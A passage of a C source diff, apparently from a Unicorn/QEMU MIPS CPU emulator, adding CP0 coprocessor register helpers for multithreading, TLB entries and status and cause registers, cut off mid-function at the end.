* mips_cpu_map_tc: + * @env: CPU from which mapping is performed. + * @tc: Should point to an int with the value of the global TC index. + * + * This function will transform @tc into a local index within the + * returned #CPUMIPSState. + */ +/* FIXME: This code assumes that all VPEs have the same number of TCs, + which depends on runtime setup. Can probably be fixed by + walking the list of CPUMIPSStates. */ +static CPUMIPSState *mips_cpu_map_tc(CPUMIPSState *env, int *tc) +{ + MIPSCPU *cpu; + CPUState *cs; + CPUState *other_cs; + int vpe_idx; + int tc_idx = *tc; + + if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP))) { + /* Not allowed to address other CPUs. */ + *tc = env->current_tc; + return env; + } + + cs = CPU(mips_env_get_cpu(env)); + vpe_idx = tc_idx / cs->nr_threads; + *tc = tc_idx % cs->nr_threads; + other_cs = qemu_get_cpu(env->uc, vpe_idx); + if (other_cs == NULL) { + return env; + } + cpu = MIPS_CPU(env->uc, other_cs); + return &cpu->env; +} + +/* The per VPE CP0_Status register shares some fields with the per TC + CP0_TCStatus registers. These fields are wired to the same registers, + so changes to either of them should be reflected on both registers. + + Also, EntryHi shares the bottom 8 bit ASID with TCStauts. + + These helper call synchronizes the regs for a given cpu. */ + +/* Called for updates to CP0_Status. */ +static void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc) +{ + int32_t tcstatus, *tcst; + uint32_t v = cpu->CP0_Status; + uint32_t cu, mx, asid, ksu; + uint32_t mask = ((1 << CP0TCSt_TCU3) + | (1 << CP0TCSt_TCU2) + | (1 << CP0TCSt_TCU1) + | (1 << CP0TCSt_TCU0) + | (1 << CP0TCSt_TMX) + | (3 << CP0TCSt_TKSU) + | (0xff << CP0TCSt_TASID)); + + cu = (v >> CP0St_CU0) & 0xf; + mx = (v >> CP0St_MX) & 0x1; + ksu = (v >> CP0St_KSU) & 0x3; + asid = env->CP0_EntryHi & 0xff; + + tcstatus = cu << CP0TCSt_TCU0; + tcstatus |= mx << CP0TCSt_TMX; + tcstatus |= ksu << CP0TCSt_TKSU; + tcstatus |= asid; + + if (tc == cpu->current_tc) { + tcst = &cpu->active_tc.CP0_TCStatus; + } else { + tcst = &cpu->tcs[tc].CP0_TCStatus; + } + + *tcst &= ~mask; + *tcst |= tcstatus; + compute_hflags(cpu); +} + +/* Called for updates to CP0_TCStatus. */ +static void sync_c0_tcstatus(CPUMIPSState *cpu, int tc, + target_ulong v) +{ + uint32_t status; + uint32_t tcu, tmx, tasid, tksu; + uint32_t mask = ((1U << CP0St_CU3) + | (1 << CP0St_CU2) + | (1 << CP0St_CU1) + | (1 << CP0St_CU0) + | (1 << CP0St_MX) + | (3 << CP0St_KSU)); + + tcu = (v >> CP0TCSt_TCU0) & 0xf; + tmx = (v >> CP0TCSt_TMX) & 0x1; + tasid = v & 0xff; + tksu = (v >> CP0TCSt_TKSU) & 0x3; + + status = tcu << CP0St_CU0; + status |= tmx << CP0St_MX; + status |= tksu << CP0St_KSU; + + cpu->CP0_Status &= ~mask; + cpu->CP0_Status |= status; + + /* Sync the TASID with EntryHi. */ + cpu->CP0_EntryHi &= ~0xff; + cpu->CP0_EntryHi = tasid; + + compute_hflags(cpu); +} + +/* Called for updates to CP0_EntryHi. */ +static void sync_c0_entryhi(CPUMIPSState *cpu, int tc) +{ + int32_t *tcst; + uint32_t asid, v = cpu->CP0_EntryHi; + + asid = v & 0xff; + + if (tc == cpu->current_tc) { + tcst = &cpu->active_tc.CP0_TCStatus; + } else { + tcst = &cpu->tcs[tc].CP0_TCStatus; + } + + *tcst &= ~0xff; + *tcst |= asid; +} + +/* CP0 helpers */ +target_ulong helper_mfc0_mvpcontrol(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPControl; +} + +target_ulong helper_mfc0_mvpconf0(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPConf0; +} + +target_ulong helper_mfc0_mvpconf1(CPUMIPSState *env) +{ + return env->mvp->CP0_MVPConf1; +} + +target_ulong helper_mfc0_random(CPUMIPSState *env) +{ + return (int32_t)cpu_mips_get_random(env); +} + +target_ulong helper_mfc0_tcstatus(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCStatus; +} + +target_ulong helper_mftc0_tcstatus(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCStatus; + else + return other->tcs[other_tc].CP0_TCStatus; +} + +target_ulong helper_mfc0_tcbind(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCBind; +} + +target_ulong helper_mftc0_tcbind(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCBind; + else + return other->tcs[other_tc].CP0_TCBind; +} + +target_ulong helper_mfc0_tcrestart(CPUMIPSState *env) +{ + return env->active_tc.PC; +} + +target_ulong helper_mftc0_tcrestart(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.PC; + else + return other->tcs[other_tc].PC; +} + +target_ulong helper_mfc0_tchalt(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCHalt; +} + +target_ulong helper_mftc0_tchalt(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCHalt; + else + return other->tcs[other_tc].CP0_TCHalt; +} + +target_ulong helper_mfc0_tccontext(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCContext; +} + +target_ulong helper_mftc0_tccontext(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCContext; + else + return other->tcs[other_tc].CP0_TCContext; +} + +target_ulong helper_mfc0_tcschedule(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCSchedule; +} + +target_ulong helper_mftc0_tcschedule(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCSchedule; + else + return other->tcs[other_tc].CP0_TCSchedule; +} + +target_ulong helper_mfc0_tcschefback(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCScheFBack; +} + +target_ulong helper_mftc0_tcschefback(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.CP0_TCScheFBack; + else + return other->tcs[other_tc].CP0_TCScheFBack; +} + +target_ulong helper_mfc0_count(CPUMIPSState *env) +{ + return (int32_t)cpu_mips_get_count(env); +} + +target_ulong helper_mftc0_entryhi(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EntryHi; +} + +target_ulong helper_mftc0_cause(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + int32_t tccause; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) { + tccause = other->CP0_Cause; + } else { + tccause = other->CP0_Cause; + } + + return tccause; +} + +target_ulong helper_mftc0_status(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_Status; +} + +target_ulong helper_mfc0_lladdr(CPUMIPSState *env) +{ + return (int32_t)(env->lladdr >> env->CP0_LLAddr_shift); +} + +target_ulong helper_mfc0_watchlo(CPUMIPSState *env, uint32_t sel) +{ + return (int32_t)env->CP0_WatchLo[sel]; +} + +target_ulong helper_mfc0_watchhi(CPUMIPSState *env, uint32_t sel) +{ + return env->CP0_WatchHi[sel]; +} + +target_ulong helper_mfc0_debug(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Debug; + if (env->hflags & MIPS_HFLAG_DM) + t0 |= 1 << CP0DB_DM; + + return t0; +} + +target_ulong helper_mftc0_debug(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + int32_t tcstatus; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + tcstatus = other->active_tc.CP0_Debug_tcstatus; + else + tcstatus = other->tcs[other_tc].CP0_Debug_tcstatus; + + /* XXX: Might be wrong, check with EJTAG spec. */ + return (other->CP0_Debug & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | + (tcstatus & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_dmfc0_tcrestart(CPUMIPSState *env) +{ + return env->active_tc.PC; +} + +target_ulong helper_dmfc0_tchalt(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCHalt; +} + +target_ulong helper_dmfc0_tccontext(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCContext; +} + +target_ulong helper_dmfc0_tcschedule(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCSchedule; +} + +target_ulong helper_dmfc0_tcschefback(CPUMIPSState *env) +{ + return env->active_tc.CP0_TCScheFBack; +} + +target_ulong helper_dmfc0_lladdr(CPUMIPSState *env) +{ + return env->lladdr >> env->CP0_LLAddr_shift; +} + +target_ulong helper_dmfc0_watchlo(CPUMIPSState *env, uint32_t sel) +{ + return env->CP0_WatchLo[sel]; +} +#endif /* TARGET_MIPS64 */ + +void helper_mtc0_index(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t index_p = env->CP0_Index & 0x80000000; + uint32_t tlb_index = arg1 & 0x7fffffff; + if (tlb_index < env->tlb->nb_tlb) { + if (env->insn_flags & ISA_MIPS32R6) { + index_p |= arg1 & 0x80000000; + } + env->CP0_Index = index_p | tlb_index; + } +} + +void helper_mtc0_mvpcontrol(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) + mask |= (1 << CP0MVPCo_CPA) | (1 << CP0MVPCo_VPC) | + (1 << CP0MVPCo_EVP); + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << CP0MVPCo_STLB); + newval = (env->mvp->CP0_MVPControl & ~mask) | (arg1 & mask); + + // TODO: Enable/disable shared TLB, enable/disable VPEs. + + env->mvp->CP0_MVPControl = newval; +} + +void helper_mtc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask; + uint32_t newval; + + mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | + (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); + newval = (env->CP0_VPEControl & ~mask) | (arg1 & mask); + + /* Yield scheduler intercept not implemented. */ + /* Gating storage scheduler intercept not implemented. */ + + // TODO: Enable/disable TCs. + + env->CP0_VPEControl = newval; +} + +void helper_mttc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + uint32_t mask; + uint32_t newval; + + mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | + (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); + newval = (other->CP0_VPEControl & ~mask) | (arg1 & mask); + + /* TODO: Enable/disable TCs. */ + + other->CP0_VPEControl = newval; +} + +target_ulong helper_mftc0_vpecontrol(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + /* FIXME: Mask away return zero on read bits. */ + return other->CP0_VPEControl; +} + +target_ulong helper_mftc0_vpeconf0(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_VPEConf0; +} + +void helper_mtc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { + if (env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA)) + mask |= (0xff << CP0VPEC0_XTC); + mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + } + newval = (env->CP0_VPEConf0 & ~mask) | (arg1 & mask); + + // TODO: TC exclusive handling due to ERL/EXL. + + env->CP0_VPEConf0 = newval; +} + +void helper_mttc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + uint32_t mask = 0; + uint32_t newval; + + mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + newval = (other->CP0_VPEConf0 & ~mask) | (arg1 & mask); + + /* TODO: TC exclusive handling due to ERL/EXL. */ + other->CP0_VPEConf0 = newval; +} + +void helper_mtc0_vpeconf1(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0; + uint32_t newval; + + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (0xff << CP0VPEC1_NCX) | (0xff << CP0VPEC1_NCP2) | + (0xff << CP0VPEC1_NCP1); + newval = (env->CP0_VPEConf1 & ~mask) | (arg1 & mask); + + /* UDI not implemented. */ + /* CP2 not implemented. */ + + // TODO: Handle FPU (CP1) binding. + + env->CP0_VPEConf1 = newval; +} + +void helper_mtc0_yqmask(CPUMIPSState *env, target_ulong arg1) +{ + /* Yield qualifier inputs not implemented. */ + env->CP0_YQMask = 0x00000000; +} + +void helper_mtc0_vpeopt(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_VPEOpt = arg1 & 0x0000ffff; +} + +void helper_mtc0_entrylo0(CPUMIPSState *env, target_ulong arg1) +{ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); + env->CP0_EntryLo0 = (arg1 & 0x3FFFFFFF) | (rxi << (CP0EnLo_XI - 30)); +} + +#if defined(TARGET_MIPS64) +void helper_dmtc0_entrylo0(CPUMIPSState *env, uint64_t arg1) +{ + uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); + env->CP0_EntryLo0 = (arg1 & 0x3FFFFFFF) | rxi; +} +#endif + +void helper_mtc0_tcstatus(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = env->CP0_TCStatus_rw_bitmask; + uint32_t newval; + + newval = (env->active_tc.CP0_TCStatus & ~mask) | (arg1 & mask); + + env->active_tc.CP0_TCStatus = newval; + sync_c0_tcstatus(env, env->current_tc, newval); +} + +void helper_mttc0_tcstatus(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCStatus = arg1; + else + other->tcs[other_tc].CP0_TCStatus = arg1; + sync_c0_tcstatus(other, other_tc, arg1); +} + +void helper_mtc0_tcbind(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = (1 << CP0TCBd_TBE); + uint32_t newval; + + if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << CP0TCBd_CurVPE); + newval = (env->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); + env->active_tc.CP0_TCBind = newval; +} + +void helper_mttc0_tcbind(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + uint32_t mask = (1 << CP0TCBd_TBE); + uint32_t newval; + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) + mask |= (1 << CP0TCBd_CurVPE); + if (other_tc == other->current_tc) { + newval = (other->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); + other->active_tc.CP0_TCBind = newval; + } else { + newval = (other->tcs[other_tc].CP0_TCBind & ~mask) | (arg1 & mask); + other->tcs[other_tc].CP0_TCBind = newval; + } +} + +void helper_mtc0_tcrestart(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.PC = arg1; + env->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + env->lladdr = 0ULL; + /* MIPS16 not implemented. */ +} + +void helper_mttc0_tcrestart(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) { + other->active_tc.PC = arg1; + other->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + other->lladdr = 0ULL; + /* MIPS16 not implemented. */ + } else { + other->tcs[other_tc].PC = arg1; + other->tcs[other_tc].CP0_TCStatus &= ~(1 << CP0TCSt_TDS); + other->lladdr = 0ULL; + /* MIPS16 not implemented. */ + } +} + +void helper_mtc0_tchalt(CPUMIPSState *env, target_ulong arg1) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + env->active_tc.CP0_TCHalt = arg1 & 0x1; + + // TODO: Halt TC / Restart (if allocated+active) TC. + if (env->active_tc.CP0_TCHalt & 1) { + mips_tc_sleep(cpu, env->current_tc); + } else { + mips_tc_wake(cpu, env->current_tc); + } +} + +void helper_mttc0_tchalt(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + MIPSCPU *other_cpu = mips_env_get_cpu(other); + + // TODO: Halt TC / Restart (if allocated+active) TC. + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCHalt = arg1; + else + other->tcs[other_tc].CP0_TCHalt = arg1; + + if (arg1 & 1) { + mips_tc_sleep(other_cpu, other_tc); + } else { + mips_tc_wake(other_cpu, other_tc); + } +} + +void helper_mtc0_tccontext(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCContext = arg1; +} + +void helper_mttc0_tccontext(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCContext = arg1; + else + other->tcs[other_tc].CP0_TCContext = arg1; +} + +void helper_mtc0_tcschedule(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCSchedule = arg1; +} + +void helper_mttc0_tcschedule(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCSchedule = arg1; + else + other->tcs[other_tc].CP0_TCSchedule = arg1; +} + +void helper_mtc0_tcschefback(CPUMIPSState *env, target_ulong arg1) +{ + env->active_tc.CP0_TCScheFBack = arg1; +} + +void helper_mttc0_tcschefback(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.CP0_TCScheFBack = arg1; + else + other->tcs[other_tc].CP0_TCScheFBack = arg1; +} + +void helper_mtc0_entrylo1(CPUMIPSState *env, target_ulong arg1) +{ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); + env->CP0_EntryLo1 = (arg1 & 0x3FFFFFFF) | (rxi << (CP0EnLo_XI - 30)); +} + +#if defined(TARGET_MIPS64) +void helper_dmtc0_entrylo1(CPUMIPSState *env, uint64_t arg1) +{ + uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); + env->CP0_EntryLo1 = (arg1 & 0x3FFFFFFF) | rxi; +} +#endif + +void helper_mtc0_context(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Context = (env->CP0_Context & 0x007FFFFF) | (arg1 & ~0x007FFFFF); +} + +void helper_mtc0_pagemask(CPUMIPSState *env, target_ulong arg1) +{ + uint64_t mask = arg1 >> (TARGET_PAGE_BITS + 1); + if (!(env->insn_flags & ISA_MIPS32R6) || (arg1 == ~0) || + (mask == 0x0000 || mask == 0x0003 || mask == 0x000F || + mask == 0x003F || mask == 0x00FF || mask == 0x03FF || + mask == 0x0FFF || mask == 0x3FFF || mask == 0xFFFF)) { + env->CP0_PageMask = arg1 & (0x1FFFFFFF & (((unsigned int)TARGET_PAGE_MASK) << 1)); + } +} + +void helper_mtc0_pagegrain(CPUMIPSState *env, target_ulong arg1) +{ + /* SmartMIPS not implemented */ + /* Large physaddr (PABITS) not implemented */ + /* 1k pages not implemented */ + env->CP0_PageGrain = (arg1 & env->CP0_PageGrain_rw_bitmask) | + (env->CP0_PageGrain & ~env->CP0_PageGrain_rw_bitmask); +} + +void helper_mtc0_wired(CPUMIPSState *env, target_ulong arg1) +{ + if (env->insn_flags & ISA_MIPS32R6) { + if (arg1 < env->tlb->nb_tlb) { + env->CP0_Wired = arg1; + } + } else { + env->CP0_Wired = arg1 % env->tlb->nb_tlb; + } +} + +void helper_mtc0_srsconf0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf0 |= arg1 & env->CP0_SRSConf0_rw_bitmask; +} + +void helper_mtc0_srsconf1(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf1 |= arg1 & env->CP0_SRSConf1_rw_bitmask; +} + +void helper_mtc0_srsconf2(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf2 |= arg1 & env->CP0_SRSConf2_rw_bitmask; +} + +void helper_mtc0_srsconf3(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf3 |= arg1 & env->CP0_SRSConf3_rw_bitmask; +} + +void helper_mtc0_srsconf4(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_SRSConf4 |= arg1 & env->CP0_SRSConf4_rw_bitmask; +} + +void helper_mtc0_hwrena(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = 0x0000000F; + + if (env->CP0_Config3 & (1 << CP0C3_ULRI)) { + mask |= (1 << 29); + + if (arg1 & (1 << 29)) { + env->hflags |= MIPS_HFLAG_HWRENA_ULR; + } else { + env->hflags &= ~MIPS_HFLAG_HWRENA_ULR; + } + } + + env->CP0_HWREna = arg1 & mask; +} + +void helper_mtc0_count(CPUMIPSState *env, target_ulong arg1) +{ + cpu_mips_store_count(env, arg1); +} + +void helper_mtc0_entryhi(CPUMIPSState *env, target_ulong arg1) +{ + target_ulong old, val, mask; + mask = (((unsigned int)TARGET_PAGE_MASK) << 1) | 0xFF; + if (((env->CP0_Config4 >> CP0C4_IE) & 0x3) >= 2) { + mask |= 1 << CP0EnHi_EHINV; + } + + /* 1k pages not implemented */ +#if defined(TARGET_MIPS64) + if (env->insn_flags & ISA_MIPS32R6) { + int entryhi_r = extract64(arg1, 62, 2); + int config0_at = extract32(env->CP0_Config0, 13, 2); + bool no_supervisor = (env->CP0_Status_rw_bitmask & 0x8) == 0; + if ((entryhi_r == 2) || + (entryhi_r == 1 && (no_supervisor || config0_at == 1))) { + /* skip EntryHi.R field if new value is reserved */ + mask &= ~(0x3ull << 62); + } + } + mask &= env->SEGMask; +#endif + old = env->CP0_EntryHi; + val = (arg1 & mask) | (old & ~mask); + env->CP0_EntryHi = val; + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + sync_c0_entryhi(env, env->current_tc); + } + /* If the ASID changes, flush qemu's TLB. */ + if ((old & 0xFF) != (val & 0xFF)) + cpu_mips_tlb_flush(env, 1); +} + +void helper_mttc0_entryhi(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + other->CP0_EntryHi = arg1; + sync_c0_entryhi(other, other_tc); +} + +void helper_mtc0_compare(CPUMIPSState *env, target_ulong arg1) +{ + cpu_mips_store_compare(env, arg1); +} + +void helper_mtc0_status(CPUMIPSState *env, target_ulong arg1) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + uint32_t val, old; + uint32_t mask = env->CP0_Status_rw_bitmask; + + if (env->insn_flags & ISA_MIPS32R6) { + if (extract32(env->CP0_Status, CP0St_KSU, 2) == 0x3) { + mask &= ~(3 << CP0St_KSU); + } + mask &= ~(0x00180000 & arg1); + } + + val = arg1 & mask; + old = env->CP0_Status; + env->CP0_Status = (env->CP0_Status & ~mask) | val; + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + sync_c0_status(env, env, env->current_tc); + } else { + compute_hflags(env); + } + + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log("Status %08x (%08x) => %08x (%08x) Cause %08x", + old, old & env->CP0_Cause & CP0Ca_IP_mask, + val, val & env->CP0_Cause & CP0Ca_IP_mask, + env->CP0_Cause); + switch (env->hflags & MIPS_HFLAG_KSU) { + case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; + case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; + case MIPS_HFLAG_KM: qemu_log("\n"); break; + default: + cpu_abort(CPU(cpu), "Invalid MMU mode!\n"); + break; + } + } +} + +void helper_mttc0_status(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + other->CP0_Status = arg1 & ~0xf1000018; + sync_c0_status(env, other, other_tc); +} + +void helper_mtc0_intctl(CPUMIPSState *env, target_ulong arg1) +{ + /* vectored interrupts not implemented, no performance counters. */ + env->CP0_IntCtl = (env->CP0_IntCtl & ~0x000003e0) | (arg1 & 0x000003e0); +} + +void helper_mtc0_srsctl(CPUMIPSState *env, target_ulong arg1) +{ + uint32_t mask = (0xf << CP0SRSCtl_ESS) | (0xf << CP0SRSCtl_PSS); + env->CP0_SRSCtl = (env->CP0_SRSCtl & ~mask) | (arg1 & mask); +} + +static void mtc0_cause(CPUMIPSState *cpu, target_ulong arg1) +{ + uint32_t mask = 0x00C00300; + uint32_t old = cpu->CP0_Cause; + + if (cpu->insn_flags & ISA_MIPS32R2) { + mask |= 1 << CP0Ca_DC; + } + if (cpu->insn_flags & ISA_MIPS32R6) { + mask &= ~((1 << CP0Ca_WP) & arg1); + } + + cpu->CP0_Cause = (cpu->CP0_Cause & ~mask) | (arg1 & mask); + + if ((old ^ cpu->CP0_Cause) & (1 << CP0Ca_DC)) { + if (cpu->CP0_Cause & (1 << CP0Ca_DC)) { + cpu_mips_stop_count(cpu); + } else { + cpu_mips_start_count(cpu); + } + } + +#if 0 + int i; + /* Set/reset software interrupts */ + for (i = 0 ; i < 2 ; i++) { + if ((old ^ cpu->CP0_Cause) & (1 << (CP0Ca_IP + i))) { + cpu_mips_soft_irq(cpu, i, cpu->CP0_Cause & (1 << (CP0Ca_IP + i))); + } + } +#endif +} + +void helper_mtc0_cause(CPUMIPSState *env, target_ulong arg1) +{ + mtc0_cause(env, arg1); +} + +void helper_mttc0_cause(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + mtc0_cause(other, arg1); +} + +target_ulong helper_mftc0_epc(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EPC; +} + +target_ulong helper_mftc0_ebase(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + return other->CP0_EBase; +} + +void helper_mtc0_ebase(CPUMIPSState *env, target_ulong arg1) +{ + /* vectored interrupts not implemented */ + env->CP0_EBase = (env->CP0_EBase & ~0x3FFFF000) | (arg1 & 0x3FFFF000); +} + +void helper_mttc0_ebase(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + other->CP0_EBase = (other->CP0_EBase & ~0x3FFFF000) | (arg1 & 0x3FFFF000); +} + +target_ulong helper_mftc0_configx(CPUMIPSState *env, target_ulong idx) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + switch (idx) { + case 0: return other->CP0_Config0; + case 1: return other->CP0_Config1; + case 2: return other->CP0_Config2; + case 3: return other->CP0_Config3; + /* 4 and 5 are reserved. */ + case 6: return other->CP0_Config6; + case 7: return other->CP0_Config7; + default: + break; + } + return 